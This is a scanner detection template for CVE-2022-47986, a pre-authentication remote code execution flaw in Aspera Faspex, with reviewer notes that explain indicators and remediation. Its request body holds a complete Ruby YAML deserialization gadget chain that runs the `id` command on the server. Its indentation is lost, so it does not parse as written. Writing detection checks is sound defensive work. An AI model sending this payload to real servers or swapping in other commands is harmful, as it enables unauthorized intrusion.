漏洞描述
app="Aspera-Faspex"
# Detection template for CVE-2022-47986 (named below as "Aspera Faspex Pre Auth RCE").
# It sends one unauthenticated POST and reports a hit only when the response
# shows that a command ran on the server.
# NOTE(review): the nesting indentation of this template was lost in this copy;
# every key appears at column 0, so the file does not parse as written.
id: CVE-2022-47986
info:
name: Aspera Faspex Pre Auth RCE
author: zan8in
severity: critical
verified: true
# The description holds only the product fingerprint query, not a prose summary.
description: |
app="Aspera-Faspex"
# Random lowercase filler strings substituted into the {{...}} placeholders of the body.
set:
randstr: randomLowercase(12)
randstr4: randomLowercase(4)
randstr8: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /aspera/faspex/package_relay/relay_package
headers:
Content-Type: application/json
# The "external_emails" JSON field carries an embedded YAML document made of
# !ruby/object tags. That only has an effect if the server parses the field with
# a loader that instantiates tagged Ruby objects (presumably an unsafe YAML load;
# the server code is not shown here). A safe loader such as Ruby's YAML.safe_load
# rejects these tags.
# Defender view: a POST to the relay_package path whose external_emails value
# contains "!ruby/object" is a strong indicator for this check. The fixed UUID
# reused in package_uuid and delivery_uuid may also serve as a signature of this
# specific template. Remediation is the vendor fix for this CVE; until then,
# restrict or filter access to the endpoint.
body: |
{"package_file_list": ["/"], "external_emails": "\n---\n- !ruby/object:Gem::Installer\n i: x\n- !ruby/object:Gem::SpecFetcher\n i: y\n- !ruby/object:Gem::Requirement\n requirements:\n !ruby/object:Gem::Package::TarReader\n io: &1 !ruby/object:Net::BufferedIO\n io: &1 !ruby/object:Gem::Package::TarReader::Entry\n read: 0\n header: \"pew\"\n debug_output: &1 !ruby/object:Net::WriteAdapter\n socket: &1 !ruby/object:PrettyPrint\n output: !ruby/object:Net::WriteAdapter\n socket: &1 !ruby/module \"Kernel\"\n method_id: :eval\n newline: \"throw `id`\"\n buffer: {}\n group_stack:\n - !ruby/object:PrettyPrint::Group\n break: true\n method_id: :breakable\n", "package_name": "{{randstr4}}", "package_note": "{{randstr}}", "original_sender_name": "{{randstr}}", "package_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", "metadata_human_readable": "Yes", "forward": "pew", "metadata_json": "{}", "delivery_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", "delivery_sender_name": "{{randstr8}}", "delivery_title": "{{randstr4}}", "delivery_note": "{{randstr4}}", "delete_after_download": true, "delete_after_download_condition": "IDK"}
# Match condition: HTTP 500 whose body contains text shaped like `id` command
# output (uid=/gid=/groups= followed by a number and a parenthesised name).
# An HTTP 500 alone does not satisfy this rule; both conditions are required.
expression: 'response.status == 500 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)'
# Overall verdict: the template reports a finding exactly when rule r0 matches.
expression: r0()